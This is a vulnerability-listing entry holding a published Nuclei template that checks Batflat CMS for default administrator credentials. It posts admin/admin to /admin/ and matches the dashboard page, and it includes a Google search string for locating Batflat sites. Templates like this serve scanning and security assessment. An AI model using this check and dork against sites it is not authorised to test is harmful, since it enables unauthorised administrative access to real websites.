漏洞描述
Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
batflat-default-login: Batflat CMS - Default Login
PoC代码[已公开]
id: batflat-default-login
info:
name: Batflat CMS - Default Login
author: r3Y3r53
severity: high
description: |
Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
reference:
- https://www.exploitalert.com/view-details.html?id=34749
- https://cxsecurity.com/issue/WLB-2020010100
classification:
cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: batflat
product: batflat
google-query: intext:"Powered by Batflat."
tags: default-login,batflat,vuln
http:
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Batflat - Dashboard")'
condition: and
# digest: 4a0a00473045022004cdc59bb0f9d7f1b1d1923a0349e94cc7c214aca26c1177d8f7467a17d5c8ef022100e9ed6d473927f70729452707cc07a3d3aa3ba833e73c424cd2214706618edf6c:922c64590222798bb761d5b6d8e72950